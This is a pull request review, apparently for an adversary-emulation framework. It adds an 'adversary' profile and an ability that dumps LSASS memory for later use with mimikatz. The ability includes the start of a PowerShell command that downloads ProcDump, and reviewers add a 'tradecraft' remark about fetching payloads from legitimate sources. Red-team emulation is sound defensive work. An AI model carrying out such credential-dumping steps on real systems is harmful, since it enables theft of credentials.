### PR TITLE
Binary proxying

### PR DESCRIPTION
**Pull request by privateducky**

### CODE REVIEW

File: data/adversaries/bcdbf6b9-14c5-495c-be84-37bce32c312b.yml [hunk 1]
```diff
@@ -0,0 +1,12 @@
+---
+id: bcdbf6b9-14c5-495c-be84-37bce32c312b
+name:  Singed Binary Proxy Execution
```
Comment (privateducky) [inline data/adversaries/bcdbf6b9-14c5-495c-be84-37bce32c312b.yml]: spelling: signed

File: data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml [hunk 2]
```diff
@@ -0,0 +1,26 @@
...
+  description: Dump lsass for later use with mimikatz
+  tactic: Credential Dumping
+  technique:
+    attack_id: T1003
+    name: Credential Dumping
+  platforms:
+    windows:
+      psh:
+        command: |
+            $ps_url = "https://download.sysinternals.com/files/Procdump.zip";
```
Comment (wbooth) [inline data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml]: we should handle this server side
also @unkempthenry recently added this ability

**Comment by privateducky** [comment]
@jstroud-mitre I opened this PR for you -- but can you address the comments and get it across the line?

File: data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml (hunk 2 above)
Comment (jstroud-mitre) [reply data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml]: As in we should host sysinternals in payloads or have a fact to specify the remote URL to download?

Comment (unkempthenry) [reply data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml]: hosting sysinternals is tricky b/c their license forbids redistribution.

Comment (jstroud-mitre) [reply data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml]: Alright, in that case I'll break the URL out into it's own fact.

Comment (khyberspache) [reply data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml]: @wbooth from a "tradecraft" perspective, it's better to pull payloads from legitimate locations when possible.  Food for thought

Comment (jstroud-mitre) [reply data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml]: How would we like to proceed?

Comment (wbooth) [reply data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml]: let's merge this in as is and address the download options and channels separately.

**Pull request merged**